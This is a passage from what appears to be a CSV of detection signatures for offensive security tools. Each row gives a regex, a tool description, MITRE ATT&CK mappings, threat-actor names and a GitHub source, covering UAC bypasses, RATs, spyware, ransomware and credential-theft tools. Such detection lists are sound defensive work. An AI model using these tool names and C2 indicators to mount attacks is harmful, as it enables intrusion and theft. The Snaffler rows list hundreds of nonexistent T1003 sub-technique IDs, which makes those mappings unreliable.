RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","61787"
"*uac-schtasks*",".{0,1000}uac\-schtasks.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61788"
"*uac-silentcleanup*",".{0,1000}uac\-silentcleanup.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","61789"
"*uac-token-duplication*",".{0,1000}uac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61790"
"*UACTokenManipulationManager.cs*",".{0,1000}UACTokenManipulationManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","61791"
"*uaf2john.*",".{0,1000}uaf2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61792"
"*uberfile --lhost* --lport * --target-os * --downloader *",".{0,1000}uberfile\s\-\-lhost.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-target\-os\s.{0,1000}\s\-\-downloader\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61793"
"*ubiq-eu1.picopool.org*",".{0,1000}ubiq\-eu1\.picopool\.org.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","61794"
"*ubuntu:dnscrypt-msi*",".{0,1000}ubuntu\:dnscrypt\-msi.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","61795"
"*udmp-parser-main*",".{0,1000}udmp\-parser\-main.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","61797"
"*UDVC-Server.exe -c * -i 127.0.0.1*",".{0,1000}UDVC\-Server\.exe\s\-c\s.{0,1000}\s\-i\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","N/A","3","253","55","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z","61798"
"*UFONet*",".{0,1000}UFONet.{0,1000}","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","#P2P","N/A","N/A","10","2321","622","2024-08-23T02:21:33Z","2013-06-18T18:11:25Z","61799"
"*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*",".{0,1000}UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61800"
"*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*",".{0,1000}UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61801"
"*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*",".{0,1000}UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61802"
"*uhttpsharp.*",".{0,1000}uhttpsharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","61803"
"*ui\sAINT.java*",".{0,1000}ui\\sAINT\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","61805"
"*uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com*",".{0,1000}uiredn4njfsa4234bafb32ygjdawfvs\.frascuft\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61806"
"*UklGRjT7DwBXQVZFZm10IBAAAAABAAEAgD4AAAB9AAACABAAZGF0YRD7DwD*",".{0,1000}UklGRjT7DwBXQVZFZm10IBAAAAABAAEAgD4AAAB9AAACABAAZGF0YRD7DwD.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","61807"
"*uknowsec/CreateService*",".{0,1000}uknowsec\/CreateService.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","1","N/A","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","61808"
"*uknowsec/JuicyPotato*",".{0,1000}uknowsec\/JuicyPotato.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","61809"
"*uknowsec/keylogger*",".{0,1000}uknowsec\/keylogger.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","1","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","61810"
"*uknowsec/SharpAVKB*",".{0,1000}uknowsec\/SharpAVKB.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","1","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","61811"
"*uknowsec/SharpDecryptPwd*",".{0,1000}uknowsec\/SharpDecryptPwd.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","61812"
"*uknowsec/SharpEventLog*",".{0,1000}uknowsec\/SharpEventLog.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","1","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","61813"
"*uknowsec/TailorScan*",".{0,1000}uknowsec\/TailorScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","61814"
"*UlBDIFNlcnZlciBIb3N0*",".{0,1000}UlBDIFNlcnZlciBIb3N0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61816"
"*UlBDIFNlcnZlciBQb3J0*",".{0,1000}UlBDIFNlcnZlciBQb3J0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61817"
"*Ullaakut/Gorsair*",".{0,1000}Ullaakut\/Gorsair.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","61818"
"*UltraSnaffCore.csproj*",".{0,1000}UltraSnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","61820"
"*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 